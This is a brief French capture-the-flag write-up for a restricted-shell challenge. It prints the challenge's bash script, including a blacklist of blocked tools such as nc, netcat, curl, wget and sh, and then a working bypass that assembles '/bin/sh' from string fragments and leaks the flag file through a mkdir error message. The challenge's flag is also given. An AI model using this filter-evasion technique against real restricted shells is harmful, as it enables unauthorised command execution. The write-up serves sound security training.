#Pwnerrnank Solution : Shell Jailbreak

Problème :

Facile ! Lire le fichier flag.txt!
nc service.challenges.pwnerrank.com 5004

#!/bin/bash

blacklist=\
'flag\|<\|$\|"\|'"'"'\|'\
'cat\|tac\|*\|?\|less\|more\|pico\|nano\|edit\|hexdump\|xxd\|'\
'sed\|tail\|diff\|grep\|paste\|strings\|bas64\|sort\|uniq\|cut\|awk\|'\
'bzip\|gzip\|xz\|tar\|ar\|'\
'mv\|cp\|ln\|nl\|'\
'python\|perl\|sh\|cc\|g++\|php\|hd\|g++\|gcc\|curl\|tcp\|udp\|'\
'scp\|sftp\|wget\|nc\|netcat'

printf '$ '
while read line
do
    match="$(echo "$line" | grep -o "$blacklist")"
    if [ -z "$match" ]
    then
        echo "$(bash -c "$line")"
    else
        echo "What are you doing ?"
    fi
    printf '$ '
done

Solution :

$ nc service.challenges.pwnerrank.com 5004
$ a=/bin/s;a+=h;`$a`
$ mkdir `cat /home/script4/flag.txt`
$ mkdir: cannot create directory pwnerrank{rolling_in_the_box}: Permission denied



AUTEUR : SALIOU THIAM